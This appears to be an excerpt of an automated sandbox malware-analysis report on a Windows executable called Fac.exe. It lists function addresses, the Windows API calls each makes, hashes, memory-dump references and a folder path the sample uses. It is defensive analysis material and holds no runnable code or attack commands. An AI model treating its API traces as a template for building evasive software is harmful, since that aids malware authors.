Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
Instruction ID: d123e8d396e713de7048fa64f9ea280ab7714f4756ad7edd7a8c63d0e13ac4ca
Opcode Fuzzy Hash: 5261ed7edd04a14d893c83910459d3c8deec0037bccb67e23753061ef382d847
Instruction Fuzzy Hash: 16F09031A08510A7DB20ABB54F4DD5F22949B82369B28073BB812B21E1DAFDC54259AE

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8

Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4

Function 70172997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7017405C,00000004,00000040,7017404C), ref: 701729B5

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6df189a0c62573df81b278e4924f64fc7ed6c4d14a3486e7c7a9b969c9225312
Instruction ID: b00cae74e3dcf3a57a3f767af484b35d8c116f36d57b204e29bdd316a2ed5bc4
Opcode Fuzzy Hash: 6df189a0c62573df81b278e4924f64fc7ed6c4d14a3486e7c7a9b969c9225312
Instruction Fuzzy Hash: A8F0A5B3944280DFC350CF6A8C44B85BBE0E349304B31A53AF3A9D6A60E3B444C4CB52

Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C

Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
Instruction ID: ddf2f8c37bfc1fcb0df662674942ba22a859a8995a75fa35abd24466b818891c
Opcode Fuzzy Hash: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
Instruction Fuzzy Hash: BFD05E73F142008BD720DBB8BA8945E73A8E780319320883BE102F1191E97888524A2D

Non-executed Functions

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
LoadBitmapW.USER32(0000006E), ref: 00404CE8
SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,000000F0), ref: 00404E99
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
ShowWindow.USER32(?,00000005), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

, xrefs: 00405221
M, xrefs: 00404E12
N, xrefs: 00404EF3

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040473B
SetWindowTextW.USER32(00000000,?), ref: 00404765
SHBrowseForFolderW.SHELL32(?), ref: 00404816
CoTaskMemFree.OLE32(00000000), ref: 00404821
lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
lstrcatW.KERNEL32(?,Call), ref: 0040485F
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871

Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1

Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Fac.exe",00403334,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F

Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 0040483C
Call, xrefs: 0040484D, 00404852, 0040485D
A, xrefs: 0040480F
6B, xrefs: 004047E9

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$6B
API String ID: 2624150263-2210979536
Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
